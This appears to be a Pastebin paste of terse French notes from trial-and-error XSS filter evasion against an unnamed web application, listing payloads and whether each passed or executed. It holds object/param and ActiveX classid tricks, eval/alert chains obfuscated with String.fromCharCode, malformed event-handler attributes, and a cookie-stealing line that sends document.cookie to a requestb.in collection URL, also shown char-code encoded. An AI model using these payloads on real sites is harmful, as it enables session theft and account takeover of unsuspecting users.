Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <object><param value></param></object>
- <object><param value></param></object>
- ceci passe
- name="src" value=
- "javascript:alert(0)">
- <object><param name=src value=></param></object>
- ok ceci passe
- <object><param name=src value=javascript></param></object>
- ok ceci passe
- <object><param name=src value=javascript:alert(0)></param></object>
- non ceci ne passe pas
- <object><param name=src value=javascript:></param></object>
- non le : fout la merde
- <object><param name=src value=a=eval;b=alert;a(b((String.fromCharCode(88,83,83)));></param></object>
- passe mais non interprété
- <object><param name=onerror value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></param></object>
- passe mais non interprété
- <html><title>{}</title></html>
- ok ceci passe
- <html><title>{}</title></html>
- ok ceci passe
- <html><title>{a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));}</title></html>
- ceci passe mais non interprété
- <html><title>{a=eval;b=alert;a(b('xss'));}</title></html>
- xss détecté
- <b "<
- passe
- <sCrIpt>alert(1)</ScRipt>
- Ne passe pas,
- <applet passe aussi
- <object codebase= >tata</object> ok
- continue de test
- <object codebase=https://requestb.in/186lk5x1?admin >tata</object>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=></OBJECT>
- ceci passe
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(123));></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
- ceci passe
- Code à injecter :
- document.location('https://requestb.in/186lk5x1/?cookie='+document.cookie)
- il faut le mettre en char code
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;a(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,40,39,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,49,56,54,108,107,53,120,49,47,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41););></OBJECT>
- ceci passe mais pas de résultats
- <applet java_codebase=http://someurl java_object=xss.ser></applet>
- #$%&()*~+-_.,:;?@[/|\]^
- !`
- cela a l'air de marché
- t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));
- <a onerror!=prompt('1') >aa</a>
- <a onerror!=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror`t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> passe pas
- <a onerror%=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onerror$=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
- <a onmouseover />
- =t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> nok
- <a onmouseover#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> n'interprète pas
- <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> cela passe en sur
- <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> passe pas avec $!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
